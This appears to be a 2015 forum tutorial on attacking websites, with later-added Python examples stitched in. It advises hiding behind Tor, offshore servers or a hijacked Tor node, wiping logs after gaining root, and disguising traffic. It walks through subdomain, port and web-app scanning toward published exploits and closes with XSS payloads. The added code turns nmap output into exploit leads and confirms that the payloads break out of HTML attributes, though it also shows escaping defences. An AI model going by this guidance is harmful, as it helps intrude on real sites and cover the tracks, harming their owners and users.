How to Hack a Website. Part 1

Aug 6, 2015 03:15 AM

Part 1: Staying Anonymous

1.) Install Whonix - "Whonix is a Debian GNU/Linux based security-focused Linux distribution. It aims to provide privacy, security and anonymity on the internet. The operating system consists of two virtual machines, a "Workstation" and a Tor "Gateway", running Debian GNU/Linux." Basically: Whonix will send all your requests through Tor.

2.) That setup is for testing only; do not run the actual attack over Tor. The alternatives are a virtual private server hosted abroad (Sweden, for example) or taking over a Tor node and using it as your own. There is always more than one option. A virtual private server is usually the simplest choice, and it is the one I recommend.

3.) Once you have root on the server, remember to remove all the logs.

4.) Use a realistic user-agent. The string Mozilla/4.0 (compatible; MSIE 5.5; Windows 95) shows the format, but a fifteen-year-old browser on Windows 95 stands out in a 2015 access log; copy the user-agent of a current mainstream browser instead, so your requests blend in with ordinary traffic.

5.) This one is common sense: do not tell anyone about your hacks. Telling people online over a VPN is one thing, but telling people in real life is what eventually gets you caught.

Part 2: Mapping out the target

1.) Mapping out the target is a crucial step. To hack a target you must find a vulnerability, and to find one you must know the target completely.

2.) Use a DNS scanner. Fierce finds a target's subdomains: it tries a zone transfer first and then brute-forces host names from a wordlist. On Kali Linux run fierce -dns website.com (or fierce.pl -dns website.com if you downloaded the Perl script directly).

3.) Visit every host you find. Subdomains are often older, less maintained copies of the main site, and one of them may have something good, such as a login form vulnerable to SQL injection.

Part 3: Vulnerability finding

1.) Scan the services with nmap. A version scan with the default scripts (nmap -sV -sC website.com) reports each open port, the product and version behind it, and the output of checks such as ftp-anon and http-generator.

2.) Maybe they run an FTP server that allows anonymous read or, worse, write access to something important. Believe it or not, some do. nmap's ftp-anon script reports anonymous logins; log in as anonymous yourself to see what is actually exposed.

3.) Maybe it runs old software. Search for the exact product and version string nmap reports; for many outdated versions an exploit is already published online. :)

4.) REMEMBER TO LOOK AT ALL THE SUBDOMAINS!

5.) Run Nikto, a web server scanner. It sends thousands of automated requests looking for dangerous files, outdated server software and common misconfigurations, and reports what it found. Treat its output as leads rather than confirmed vulnerabilities: it produces plenty of false positives, so verify each hit by hand.

6.) Once you know what software the website runs, e.g. WordPress, use a scanner built for it: WPScan (wpscan --url http://website.com/) identifies the WordPress version and can enumerate installed plugins, themes and user names, all of which are leads for known exploits.
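Worked example of the Part 3 triage, added here and not part of the original post: it reads the XML that nmap -sV -sC -oX writes for the hosts found in Part 2, flags anonymous FTP from the ftp-anon script output, lists every disclosed product/version string for an exploit search, and prints the Nikto and WPScan commands for each web port. The two hosts, addresses, versions and the WordPress hit in the embedded sample are constructed for the example, not real scan output.

```python
"""Triage nmap service-scan output for the checks in Part 3 (added example).

Assumes the scan was run as:  nmap -sV -sC -oX scan.xml <hosts from Part 2>
The XML sample below is constructed for this example; it is not real output.
"""
import xml.etree.ElementTree as ET

# Constructed sample of nmap -sV -sC -oX output for two fictional hosts.
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap -sV -sC -oX scan.xml">
  <host>
    <address addr="10.0.0.5" addrtype="ipv4"/>
    <hostnames><hostname name="ftp.example.com" type="user"/></hostnames>
    <ports>
      <port protocol="tcp" portid="21">
        <state state="open"/>
        <service name="ftp" product="vsftpd" version="2.3.4"/>
        <script id="ftp-anon" output="Anonymous FTP login allowed (FTP code 230)"/>
      </port>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh" product="OpenSSH" version="5.3p1"/>
      </port>
    </ports>
  </host>
  <host>
    <address addr="10.0.0.6" addrtype="ipv4"/>
    <hostnames><hostname name="blog.example.com" type="user"/></hostnames>
    <ports>
      <port protocol="tcp" portid="80">
        <state state="open"/>
        <service name="http" product="Apache httpd" version="2.2.22"/>
        <script id="http-generator" output="WordPress 4.2.2"/>
      </port>
      <port protocol="tcp" portid="443">
        <state state="closed"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """One record per open port: host, port, service, product/version, NSE script output."""
    records = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address").get("addr")
        hn = host.find("hostnames/hostname")
        name = hn.get("name") if hn is not None else addr
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed/filtered ports are not worth a follow-up
            svc = port.find("service")
            svc_attrs = svc.attrib if svc is not None else {}
            records.append({
                "host": name,
                "port": int(port.get("portid")),
                "service": svc_attrs.get("name", ""),
                "tunnel": svc_attrs.get("tunnel", ""),   # "ssl" when nmap saw HTTPS
                "product": svc_attrs.get("product", ""),
                "version": svc_attrs.get("version", ""),
                "scripts": {s.get("id"): s.get("output", "") for s in port.iter("script")},
            })
    return records


def triage(records):
    """Map each open port to the Part 3 follow-ups; returns (kind, host:port, note) tuples."""
    findings = []
    for r in records:
        target = f"{r['host']}:{r['port']}"
        banner = f"{r['product']} {r['version']}".strip()
        # Step 2: anonymous FTP. nmap's ftp-anon script says so in its output.
        if r["service"] == "ftp" and "Anonymous FTP login allowed" in r["scripts"].get("ftp-anon", ""):
            findings.append(("anonymous-ftp", target, "log in as anonymous and check what is readable/writable"))
        # Step 3: every disclosed version string is a lead for an exploit search.
        if banner:
            findings.append(("version-disclosed", target, banner))
        # Steps 5 and 6: web ports get Nikto; a WordPress generator tag gets WPScan too.
        if r["service"].startswith("http"):
            scheme = "https" if r["service"] == "https" or r["tunnel"] == "ssl" else "http"
            url = f"{scheme}://{r['host']}:{r['port']}/"
            findings.append(("run-nikto", target, f"nikto -h {url}"))
            if r["scripts"].get("http-generator", "").lower().startswith("wordpress"):
                findings.append(("run-wpscan", target, f"wpscan --url {url}"))
    return findings


if __name__ == "__main__":
    for kind, target, note in triage(parse_nmap_xml(SAMPLE_NMAP_XML)):
        print(f"{kind:<18} {target:<22} {note}")
```

Run it against a real scan by replacing SAMPLE_NMAP_XML with the contents of scan.xml; closed ports are skipped, and the printed nikto and wpscan lines are the commands to run next.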

I will show you how to get r00t in the next episode.

For a treat, I'll give you guys this:

Multiple XSS payloads, each aimed at a different injection context (attribute breakout, JavaScript string breakout, event handlers that fire without a click), so try several:

">

";alert(/null/);a =" \' nullbyte

#!">//

x" autofocus onfocus="alert('null')

Sos" onmouseover="alert('null')"/
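Why these payloads work, as an added example that is not code from the original post: a template that concatenates user input straight into an HTML attribute, and one that concatenates it into a JavaScript string literal, next to the escaped versions that neutralise them. The input field name q and the script variable are made up for the example; the three payloads are taken from the list above. Python's own HTML parser is used to show that the attribute payloads really do turn into on* event handlers.

```python
"""Why the XSS payloads above work, and what stops them (added example).

The form field and the script variable are assumptions made for this
example; the payloads are the ones listed in the post.
"""
import json
from html import escape
from html.parser import HTMLParser

# Attribute context: each payload closes value="..." with a quote and adds an
# event handler (autofocus + onfocus fires with no user interaction at all).
ATTR_PAYLOADS = [
    "x\" autofocus onfocus=\"alert('null')",
    "Sos\" onmouseover=\"alert('null')\"/",
]
# JavaScript string context: ends the string literal, runs code, reopens it.
JS_PAYLOAD = "\";alert(/null/);a =\" \\' nullbyte"


def attr_unsafe(value):
    """Vulnerable: input concatenated straight into an attribute value."""
    return f'<input type="text" name="q" value="{value}">'


def attr_safe(value):
    """Hardened: escape(quote=True) turns a double quote into &quot;, so the attribute cannot end early."""
    return f'<input type="text" name="q" value="{escape(value, quote=True)}">'


class AttrCollector(HTMLParser):
    """Collects (tag, attrs) the way a browser's tokenizer would see them."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))

    handle_startendtag = handle_starttag


def event_handlers(markup):
    """Names of on* attributes the parser finds; a non-empty list means the breakout worked."""
    p = AttrCollector()
    p.feed(markup)
    p.close()
    return sorted(n for _, a in p.tags for n in a if n.startswith("on"))


def js_unsafe(value):
    """Vulnerable: input concatenated into a JavaScript string literal."""
    return f'<script>var q = "{value}";</script>'


def js_safe(value):
    """Hardened: JSON-encode the value; also escape '<' so a '</script>' in the input cannot end the block."""
    encoded = json.dumps(value).replace("<", "\\u003c")
    return f'<script>var q = {encoded};</script>'


def unescaped_double_quotes(script):
    """Count double quotes not preceded by a backslash (heuristic: one intact string literal has exactly two)."""
    return sum(1 for i, c in enumerate(script) if c == '"' and (i == 0 or script[i - 1] != "\\"))


if __name__ == "__main__":
    for payload in ATTR_PAYLOADS:
        print("attribute context  unsafe:", event_handlers(attr_unsafe(payload)),
              " safe:", event_handlers(attr_safe(payload)))
    print("js string context  unsafe quotes:", unescaped_double_quotes(js_unsafe(JS_PAYLOAD)),
          " safe quotes:", unescaped_double_quotes(js_safe(JS_PAYLOAD)))
```

The attribute check is the one to reuse when testing a site: if the reflected page, fed through a parser, shows an on* attribute you did not put there, the input is injected unescaped in attribute context. The quote count for the script case is only a rough check; a backslash in the input that precedes a quote would confuse it, so confirm any hit by reading the generated script.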
